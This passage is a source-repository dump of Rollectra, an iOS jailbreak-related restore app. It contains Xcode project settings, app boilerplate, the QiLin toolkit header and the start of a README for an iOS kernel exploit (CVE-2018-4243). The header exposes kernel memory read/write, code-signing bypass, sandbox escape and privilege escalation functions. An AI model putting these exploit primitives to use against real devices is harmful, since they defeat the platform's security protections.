YES_AGGRESSIVE; 325 | GCC_WARN_UNUSED_FUNCTION = YES; 326 | GCC_WARN_UNUSED_VARIABLE = YES; 327 | IPHONEOS_DEPLOYMENT_TARGET = 11.4; 328 | MTL_ENABLE_DEBUG_INFO = YES; 329 | ONLY_ACTIVE_ARCH = YES; 330 | SDKROOT = iphoneos; 331 | }; 332 | name = Debug; 333 | }; 334 | 21C0FC7C21369EB800849420 /* Release */ = { 335 | isa = XCBuildConfiguration; 336 | buildSettings = { 337 | ALWAYS_SEARCH_USER_PATHS = NO; 338 | CLANG_ANALYZER_NONNULL = YES; 339 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 340 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 341 | CLANG_CXX_LIBRARY = "libc++"; 342 | CLANG_ENABLE_MODULES = YES; 343 | CLANG_ENABLE_OBJC_ARC = YES; 344 | CLANG_ENABLE_OBJC_WEAK = YES; 345 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 346 | CLANG_WARN_BOOL_CONVERSION = YES; 347 | CLANG_WARN_COMMA = YES; 348 | CLANG_WARN_CONSTANT_CONVERSION = YES; 349 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 350 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 351 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 352 | CLANG_WARN_EMPTY_BODY = YES; 353 | CLANG_WARN_ENUM_CONVERSION = YES; 354 | CLANG_WARN_INFINITE_RECURSION = YES; 355 | CLANG_WARN_INT_CONVERSION = YES; 356 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 357 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 358 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 359 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 360 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 361 | CLANG_WARN_STRICT_PROTOTYPES = YES; 362 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 363 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 364 | CLANG_WARN_UNREACHABLE_CODE = YES; 365 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 366 | CODE_SIGN_IDENTITY = "iPhone Developer"; 367 | COPY_PHASE_STRIP = NO; 368 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 369 | ENABLE_NS_ASSERTIONS = NO; 370 | ENABLE_STRICT_OBJC_MSGSEND = YES; 371 | GCC_C_LANGUAGE_STANDARD = gnu11; 372 | GCC_NO_COMMON_BLOCKS = YES; 373 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 374 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 375 | GCC_WARN_UNDECLARED_SELECTOR = YES; 376 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 377 | GCC_WARN_UNUSED_FUNCTION = YES; 378 | GCC_WARN_UNUSED_VARIABLE = YES; 379 | IPHONEOS_DEPLOYMENT_TARGET = 11.4; 380 | MTL_ENABLE_DEBUG_INFO = NO; 381 | SDKROOT = iphoneos; 382 | VALIDATE_PRODUCT = YES; 383 | }; 384 | name = Release; 385 | }; 386 | 21C0FC7E21369EB800849420 /* Debug */ = { 387 | isa = XCBuildConfiguration; 388 | buildSettings = { 389 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 390 | CODE_SIGN_IDENTITY = "iPhone Developer"; 391 | CODE_SIGN_STYLE = Manual; 392 | DEVELOPMENT_TEAM = ""; 393 | ENABLE_BITCODE = NO; 394 | FRAMEWORK_SEARCH_PATHS = ( 395 | "$(inherited)", 396 | "$(PROJECT_DIR)/Rollectra", 397 | ); 398 | INFOPLIST_FILE = Rollectra/Info.plist; 399 | IPHONEOS_DEPLOYMENT_TARGET = 11.3; 400 | LD_RUNPATH_SEARCH_PATHS = ( 401 | "$(inherited)", 402 | "@executable_path/Frameworks", 403 | ); 404 | OTHER_CFLAGS = ""; 405 | OTHER_LDFLAGS = ( 406 | "-framework", 407 | IOKit, 408 | "$(SRCROOT)/Rollectra/qilin.o", 409 | ); 410 | PRODUCT_BUNDLE_IDENTIFIER = "science.xnu.rollectra-jailed"; 411 | PRODUCT_NAME = "$(TARGET_NAME)"; 412 | PROVISIONING_PROFILE_SPECIFIER = ""; 413 | TARGETED_DEVICE_FAMILY = "1,2"; 414 | }; 415 | name = Debug; 416 | }; 417 | 21C0FC7F21369EB800849420 /* Release */ = { 418 | isa = XCBuildConfiguration; 419 | buildSettings = { 420 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 421 | CODE_SIGN_IDENTITY = "iPhone Developer"; 422 | CODE_SIGN_STYLE = Manual; 423 | DEVELOPMENT_TEAM = ""; 424 | ENABLE_BITCODE = NO; 425 | FRAMEWORK_SEARCH_PATHS = ( 426 | "$(inherited)", 427 | "$(PROJECT_DIR)/Rollectra", 428 | ); 429 | INFOPLIST_FILE = Rollectra/Info.plist; 430 | IPHONEOS_DEPLOYMENT_TARGET = 11.3; 431 | LD_RUNPATH_SEARCH_PATHS = ( 432 | "$(inherited)", 433 | "@executable_path/Frameworks", 434 | ); 435 | OTHER_CFLAGS = ""; 436 | OTHER_LDFLAGS = ( 437 | "-framework", 438 | IOKit, 439 | "$(SRCROOT)/Rollectra/qilin.o", 440 | ); 441 | PRODUCT_BUNDLE_IDENTIFIER = "science.xnu.rollectra-jailed"; 442 | PRODUCT_NAME = "$(TARGET_NAME)"; 443 | PROVISIONING_PROFILE_SPECIFIER = ""; 444 | TARGETED_DEVICE_FAMILY = "1,2"; 445 | }; 446 | name = Release; 447 | }; 448 | /* End XCBuildConfiguration section */ 449 | 450 | /* Begin XCConfigurationList section */ 451 | 21C0FC6221369EB700849420 /* Build configuration list for PBXProject "Rollectra" */ = { 452 | isa = XCConfigurationList; 453 | buildConfigurations = ( 454 | 21C0FC7B21369EB800849420 /* Debug */, 455 | 21C0FC7C21369EB800849420 /* Release */, 456 | ); 457 | defaultConfigurationIsVisible = 0; 458 | defaultConfigurationName = Release; 459 | }; 460 | 21C0FC7D21369EB800849420 /* Build configuration list for PBXNativeTarget "Rollectra" */ = { 461 | isa = XCConfigurationList; 462 | buildConfigurations = ( 463 | 21C0FC7E21369EB800849420 /* Debug */, 464 | 21C0FC7F21369EB800849420 /* Release */, 465 | ); 466 | defaultConfigurationIsVisible = 0; 467 | defaultConfigurationName = Release; 468 | }; 469 | /* End XCConfigurationList section */ 470 | }; 471 | rootObject = 21C0FC5F21369EB700849420 /* Project object */; 472 | } 473 | -------------------------------------------------------------------------------- /Rollectra.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Rollectra.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Rollectra.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | Rollectra.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Rollectra/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // Rollectra 4 | // 5 | // Created by pwn20wnd on 8/29/18. 6 | // Copyright © 2018 Pwn20wnd. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /Rollectra/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // Rollectra 4 | // 5 | // Created by pwn20wnd on 8/29/18. 6 | // Copyright © 2018 Pwn20wnd. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /Rollectra/AppIcon20x20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon20x20.png -------------------------------------------------------------------------------- /Rollectra/AppIcon20x20@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon20x20@2x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon20x20@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon20x20@3x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon29x29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon29x29.png -------------------------------------------------------------------------------- /Rollectra/AppIcon29x29@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon29x29@2x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon29x29@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon29x29@3x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon40x40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon40x40.png -------------------------------------------------------------------------------- /Rollectra/AppIcon40x40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon40x40@2x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon40x40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon40x40@3x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon76x76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon76x76.png -------------------------------------------------------------------------------- /Rollectra/AppIcon76x76@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon76x76@2x.png -------------------------------------------------------------------------------- /Rollectra/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /Rollectra/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /Rollectra/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Rollectra/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 35 | 36 | 37 | 38 | 44 | 51 | 52 | 53 | 54 | 55 | 56 | 62 | 69 | 70 | 71 | 72 | 73 | 74 | 91 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 109 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /Rollectra/Combined Shape.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/Combined Shape.png -------------------------------------------------------------------------------- /Rollectra/Combined Shape@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/Combined Shape@2x.png -------------------------------------------------------------------------------- /Rollectra/Combined Shape@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/Combined Shape@3x.png -------------------------------------------------------------------------------- /Rollectra/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleDisplayName 8 | Rollectra / SemiRestore11 9 | CFBundleExecutable 10 | $(EXECUTABLE_NAME) 11 | CFBundleIcons 12 | 13 | CFBundlePrimaryIcon 14 | 15 | CFBundleIconFiles 16 | 17 | AppIcon29x29 18 | AppIcon40x40 19 | AppIcon60x60 20 | 21 | UIPrerenderedIcon 22 | 23 | 24 | 25 | CFBundleIcons~ipad 26 | 27 | CFBundlePrimaryIcon 28 | 29 | CFBundleIconFiles 30 | 31 | AppIcon29x29 32 | AppIcon40x40 33 | AppIcon60x60 34 | AppIcon50x50 35 | AppIcon76x76 36 | 37 | UIPrerenderedIcon 38 | 39 | 40 | 41 | CFBundleIdentifier 42 | $(PRODUCT_BUNDLE_IDENTIFIER) 43 | CFBundleInfoDictionaryVersion 44 | 6.0 45 | CFBundleName 46 | $(PRODUCT_NAME) 47 | CFBundlePackageType 48 | APPL 49 | CFBundleShortVersionString 50 | 1.2 51 | CFBundleVersion 52 | 1 53 | LSApplicationQueriesSchemes 54 | 55 | tweetbot 56 | twitterrific 57 | tweetings 58 | twitter 59 | 60 | LSRequiresIPhoneOS 61 | 62 | UILaunchStoryboardName 63 | LaunchScreen 64 | UIMainStoryboardFile 65 | Main 66 | UIRequiredDeviceCapabilities 67 | 68 | armv7 69 | 70 | UISupportedInterfaceOrientations 71 | 72 | UIInterfaceOrientationPortrait 73 | 74 | UISupportedInterfaceOrientations~ipad 75 | 76 | UIInterfaceOrientationPortrait 77 | UIInterfaceOrientationPortraitUpsideDown 78 | UIInterfaceOrientationLandscapeLeft 79 | UIInterfaceOrientationLandscapeRight 80 | 81 | UIViewControllerBasedStatusBarAppearance 82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /Rollectra/QiLin.h: -------------------------------------------------------------------------------- 1 | // 2 | // jjt.h 3 | // QiLin 4 | // 5 | // Created by JL on 12/7/17. 6 | // Copyright © 2017 NewOSXBook. All rights reserved. 7 | 8 | // Revision 3: Added spawnAndPlatformize(), 9 | // moved to posix_spawn() implementation for exec() family 10 | // actually exported the set*Reporter functions (formerly ErrorHandler.. etc - 11 | // "Reporter" is more accurate, because they allow you to propagate messages to 12 | // a GUI. 13 | // 14 | // Revision 4: Added kexec (executeInKernel) 15 | // 16 | // Revision 5: KMR/KMW (Kernel memory read/write) functions weren't exported! Oops! 17 | // 18 | // Revision 6: RootFS mount, fixed bug in getting symbols (no longer needs setKernelSymbol) 19 | // and added respring 20 | // and also added uint64_t getVnodeByPathName (char *Path) ; 21 | // 22 | // (Almost) free to use (ABSE) per the license in http://NewOSXBook.com/QiLin/ 23 | // 24 | // Remember to give credit where due and please tweet with #QiLin 25 | // so others can quickly find your JailBreak or other project. 26 | // 27 | 28 | #if 0 29 | Johnny's (semi) open source license, v0.4 30 | ----------------------------------------- 31 | 32 | This is (well, will be, at the time of writing) open source, and I can't but appeal to your sense of decency. 33 | You might try compile this and try to pass it as your own. Heck, you might even try to run it through llvm-obfuscator. 34 | But that would be stealing code. And obfuscate as you will, you can't obfuscate enough to hide the methods. 35 | So, primum non nocere. Do no harm, and do not steal. 36 | 37 | To be fully clear: 38 | 39 | - Yes, you may use this source or code library as you see fit, PROVIDED THAT: 40 | 41 | - IT IS NOT USED COMMERCIALLY IN ANY WAY. For this, I ask that you contact my company, @Technologeeks, 42 | and ask for proper licensing - they'll also provide official support. 43 | 44 | - IT IS NOT USED AS A COMPONENT OF AN APT IN ANY KIND FORM OR MANNER. 45 | (NSO/Hackin9/Finfisher/Equus/etc - that means you) 46 | 47 | - WHEN YOU DO USE IT, I ASK THAT YOU MENTION THAT YOUR TOOL IS "powered by the QiLin Toolkit", 48 | or otherwise provide a user facing indication that it is using this code. 49 | I'd appreciate it if you tweeted with #QiLin, too. 50 | 51 | - If you spread lies about other people, propaganda or false claims, while using this toolkit, 52 | then you must renounce your ways, and apologize. Then you can use it freely. 53 | 54 | - There are no limitation on nationality, specific people exclusions (i.e. this is AISE, subject to last condition, above ;-), 55 | or any other race, color or creed - provided the above are met. 56 | 57 | 58 | - QiLin comes with NO LIABILITY WHATSOEVER. YOU USE THIS AT YOUR OWN RISK. 59 | 60 | I CANNOT AND WILL NOT BE HELD ACCOUNTABLE FOR ANY DAMAGE, SOFTWARE OR HARDWARE OR YOUR DATA OR OTHERWISE, 61 | 62 | WHICH MAY OR MAY NOT RESULT TO YOUR IOS DEVICE BY USING THIS. 63 | 64 | - Remember I'm doing this AS A FAVOR. I AM NO IN WAY INDEBTED OR COMMITTED TO SUPPORT THIS, OR ANY OTHER OF MY TOOLS. 65 | You don't have to thank for this (you're welcome) but please don't slander me either. 66 | 67 | - Should you wish to contribute/donate, you may do so in one of the following ways: 68 | 69 | - Monetary: Pick a charity. Any charity. Of your choice. Pay them however money you want. 70 | Optionally, tweet/fb/insta/snap-whatever a screen capture stating "#QiLin". 71 | 72 | - Development: Through http://NewOSXBook.com/forum - you are welcome to ask (proper technical, not lame wen eta) 73 | questions and engage in discussions 74 | 75 | 76 | 77 | First, do no harm. Next, have fun :-) 78 | 79 | Changelog: 80 | 81 | - v0.1 Was AISE but SE is being more of an ass than usual and slandering fake claims directly attacking me. 82 | So this was updated with new condition excluding him until he grows up and behaves like the decent, 83 | talented researcher he can be. 84 | 85 | - v0.3 adds request to tweet #QiLin. 86 | 87 | - v0.4 states what should be obvious - NO LIABILITY WHATSOEVER 88 | #endif 89 | #ifndef qilin_h 90 | #define qilin_h 91 | #include 92 | #include 93 | #include 94 | 95 | 96 | char *getMachine (void); 97 | char *getOSVer(void); 98 | 99 | typedef int (*KMRFunc)(uint64_t Address, uint64_t Len, void **To); 100 | typedef int (*KMWFunc)(uint64_t Address, uint64_t Len, void *From); 101 | void setKernelMemoryReadFunction(KMRFunc F); 102 | void setKernelMemoryWriteFunction(KMWFunc F); 103 | 104 | 105 | // MUST call either initQiLin variant first - with or without TFP0, though, that's your call. 106 | 107 | int initQiLin (mach_port_t TFP0, uint64_t KernelBase); 108 | int initQiLinWithKMRW(uint64_t KernelBase, KMRFunc Kmr, KMWFunc Kmw); 109 | int initQilinWithTFP0AndMyTaskPortAddr(mach_port_t TFP0, uint64_t MyTaskPortAddr); 110 | 111 | 112 | // System wide effects 113 | // 114 | int remountRootFS (void); 115 | int reSpring (void); // @FCE365 - this is for you 116 | 117 | pid_t execCommand(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5 , int Flags); 118 | int execCommandAndWait(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5); 119 | 120 | int setTFP0AsHostSpecialPort4 (void); 121 | 122 | // 1/17/18 - This is super useful 123 | int spawnAndPlatformize (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5); 124 | int spawnAndShaiHulud (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5); 125 | 126 | 127 | int moveFileFromAppDir (char *File, char *Dest); 128 | int disableAutoUpdates(void); 129 | 130 | // Code signing 131 | 132 | // Will set AMFId's exception ports and thereby disable code signing 133 | // 134 | int castrateAmfid (void); 135 | 136 | // Utility function - you probably won't need this directly. 137 | #define ALGORITHM_SHA256 2 138 | #define ALGORITHM_SHA1 1 139 | char *cdHashOfFile(char *fileName,int Algorithm); // Calculate CDHash of a given Mach-O (for messing with AMFI) 140 | 141 | 142 | 143 | // Kernel Memory access (wrappers over kernel_task send right) 144 | uint64_t findKernelSymbol (char *Symbol); 145 | void setKernelSymbol (char *Symbol, uint64_t Address); // NOTE: "_kernproc", not "kernproc" 146 | 147 | int readKernelMemory(uint64_t Address, uint64_t Len, void **To); 148 | int writeKernelMemory(uint64_t Address, uint64_t Len, void *From); 149 | 150 | // 03/20/2018: Kernel execution 151 | 152 | int kexec(uint64_t Address, uint64_t Arg0, uint64_t Arg1,uint64_t Arg2,uint64_t Arg3,uint64_t Arg4,uint64_t Arg5,uint64_t Arg6); 153 | 154 | 155 | // 03/20/2018 156 | uint64_t getAddressOfPort(pid_t Pid, mach_port_name_t Port); 157 | 158 | // 06/15/2018 ------- 159 | // Will return the address of the kernel vnode representing Path. 160 | uint64_t getVnodeByPathName (char *Path) ; 161 | uint64_t getRootVnodeAddr(void); // Convenience, for rootvnode ("/") instead of _rootvnode sym deref 162 | 163 | //------------------- 164 | 165 | // Not recommended, but doable: Bestow task port of Pid in TargetPid 166 | mach_port_t task_for_pid_in_kernel (pid_t Pid, pid_t TargetPid); 167 | 168 | //-------------------------------------- 169 | 170 | // Process manipulation functions 171 | 172 | // Finds the address of struct proc for this pid_t in kernel memory. 173 | uint64_t getProcStructForPid(pid_t); 174 | 175 | // Finds the pid of a process given its (base) name. Note this will only 176 | // work on processes you are the owner of (or all, if root) - this is intentional 177 | pid_t findPidOfProcess (char *ProcName) ; 178 | 179 | int setCSFlagsForProcAtAddr(uint64_t ProcStructAddr, int Flags, int Set); 180 | int setCSFlagsForPid (pid_t Whom, uint32_t Flags); 181 | int platformizePid(pid_t Whom); 182 | int rootifyPid(pid_t Whom); 183 | int ShaiHuludPid (pid_t Whom, uint64_t CredAddr); // leave 0 for root creds. 184 | int unShaiHuludPid (pid_t Whom); 185 | 186 | 187 | 188 | uint64_t borrowEntitlementsFromDonor(char *UnwittingDonor, char *Arg); 189 | // By request :-) 190 | uint64_t borrowEntitlementsFromPid(pid_t Pid); 191 | 192 | 193 | 194 | // Presently, limited to two entitlements, and assumed boolean (true) 195 | int entitlePidWithKernelEnts (pid_t Whom, char *Ent1, char *Ent2); 196 | 197 | // Convenience functions - do all the above , but on my process 198 | 199 | int platformizeMe (void); 200 | int rootifyMe(void); 201 | 202 | // Escape sandbox: 203 | // call with 0 to assume kernel cred, else specify value. Will return origCreds 204 | uint64_t ShaiHuludMe(uint64_t OtherCredsOr0ForKernelCreds); 205 | void unShaiHuludMe(uint64_t OrigCreds); 206 | int entitleMe(char *entitlementString); 207 | 208 | uint64_t getKernelCredAddr (void); 209 | 210 | 211 | /// Vnode functions - bringing @MinZheng's APFS bypass to the masses: 212 | uint64_t getVnodeByPathName (char *Path); 213 | 214 | /// Launchd handling utilities - just for you @launchderp :-) 215 | int makeLaunchdPlist (char *PlistName, char *Program, char *ProgramArguments, char *StandardOutputPath, char *StandardErrorPath, int RunAtLoad); 216 | int launjctlLaunchdPlist(char *Name); 217 | 218 | // I use these internally, not sure anyone else would need them 219 | int launjctlPrintSystem (void); 220 | int launjctlDumpState(void); 221 | 222 | 223 | // This one is still in progress. Don't use it please. 224 | int movePortToPid(mach_port_t PortMoved, pid_t Pid, mach_port_name_t Name); 225 | int spawnJailbreakServer (char *Name, mach_port_t TFP0, mach_port_name_t NameInTarget); 226 | 227 | // UI Support: 228 | // Provide status, error and debug print outs to user, 229 | // which may be redirected to GUI views, etc. 230 | // Default implmenentations are NSLog. 231 | 232 | typedef void (status_func) (char *,...); 233 | void setStatusReporter (status_func *Func); 234 | void setErrorReporter (status_func *Func); 235 | void setDebugReporter (status_func *Func); 236 | 237 | 238 | // Utility functions you probably won't need unless you want to do your own debugging 239 | void hexDump(void *Mem, int Len, uint64_t Addr); 240 | void dumpARMThreadState64(_STRUCT_ARM_THREAD_STATE64 *old_state); 241 | 242 | // Even more Internal/advanced use: 243 | uint64_t findKernelTask (void); 244 | uint64_t findMyProcStructInKernelMemory(void); // For other advanced uses I haven't provided already 245 | 246 | 247 | #endif /* qilin_h */ 248 | -------------------------------------------------------------------------------- /Rollectra/README: -------------------------------------------------------------------------------- 1 | empty_list - exploit for p0 issue 1564 (CVE-2018-4243) iOS 11.0 - 11.3.1 kernel r/w 2 | @i41nbeer 3 | 4 | BUG: 5 | getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall. 6 | 7 | When allocating a kernel buffer to serialize the attr list to there's the following comment: 8 | 9 | /* 10 | * Allocate a target buffer for attribute results. 11 | * Note that since we won't ever copy out more than the caller requested, 12 | * we never need to allocate more than they offer. 13 | */ 14 | ab.allocated = ulmin(bufferSize, fixedsize + varsize); 15 | if (ab.allocated > ATTR_MAX_BUFFER) { 16 | error = ENOMEM; 17 | VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER); 18 | goto out; 19 | } 20 | MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK); 21 | 22 | The problem is that the code doesn't then correctly handle the case when the user supplied buffer size 23 | is 